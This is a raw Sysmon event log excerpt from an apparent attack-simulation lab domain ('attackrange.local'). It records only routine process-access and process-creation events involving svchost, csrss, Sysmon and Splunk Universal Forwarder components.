08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.923{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.923{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.908{0C1E0330-F802-60EB-D979-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0D89CBF506CB439219E8F32451D302F,SHA256=D1824C29E002FE360C73B70AFC3610E7134496CB1E5986FD374B4505895BE940,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:26.235{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.220{0C1E0330-F802-60EB-D879-00000000D001}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:27.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A036E3183A666039DCDFD5D5B89DAEA,SHA256=00394804CF256D9BD911C71E7948F6350B5A5AF66DD9B5282138DE6D5E7CF910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A94671EACC594D1DA42A5C77BF805AD,SHA256=A18FCF3A9A0763BF79E6FE115E4EF9E31FCC530E78472D136B24DA88FA8EDF1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.751{0C1E0330-F803-60EB-DA79-00000000D001}30683132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
